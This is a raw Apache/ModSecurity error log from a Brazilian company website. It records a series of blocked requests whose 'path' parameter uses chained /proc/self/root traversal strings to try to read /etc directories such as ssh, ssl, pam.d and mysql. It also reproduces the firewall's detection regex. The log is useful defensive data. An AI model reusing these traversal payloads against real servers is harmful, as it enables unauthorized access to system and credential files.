[Thu Mar 19 05:00:27.598118 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:44168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutG8df6f5d65gmYZREdAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:32.033099 2026] [:error] [pid 27403:tid 140411607643904] [client 74.7.243.128:44170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutIBkFeYa1D6dYQnC_jgAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:33.755026 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:45334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutIfu8EFLIOrSqIptvZgAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:36.235196 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:45338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutJPu8EFLIOrSqIptvaAAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:36.302641 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.241.31:36032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutJP-YZRR_7pZ7nDJefQAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:00:38.881810 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:45350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutJsdf6f5d65gmYZREewAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:40.246514 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:56716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutKAkwaGbbGflqUZCGpQAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:00:41.458531 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:56900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutKfu8EFLIOrSqIptvbQAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:44.033269 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.243.128:56910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutLBkFeYa1D6dYQnC_mQAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:45.351046 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:56924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutLeoXxyEfFpUF8f_h0QAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:47.303162 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:56934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutLvu8EFLIOrSqIptvdQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:49.954166 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.243.128:56948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutMAbLMZ6AikZjR9UukQAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:52.644371 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:33820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutM-yqAr6etmhZHNo0vgAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:54.108054 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:33832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutNuyqAr6etmhZHNo0wAAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:54.687800 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:56730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutNta6ubjKNq_cu4YTSQAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:00:55.400066 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:33842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutN_u8EFLIOrSqIptveAAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:56.002202 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.241.31:41796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutOP-YZRR_7pZ7nDJegwAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:00:56.679015 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:33846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutOOoXxyEfFpUF8f_h1gAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:57.983532 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:33858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutOeoXxyEfFpUF8f_h2AAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:58.371015 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.241.31:41670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutOhkFeYa1D6dYQnC_pQAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:00:59.332280 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:33870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutO_u8EFLIOrSqIptvewAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:08.442334 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:39920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutROoXxyEfFpUF8f_h4QAAAVc"], referer: 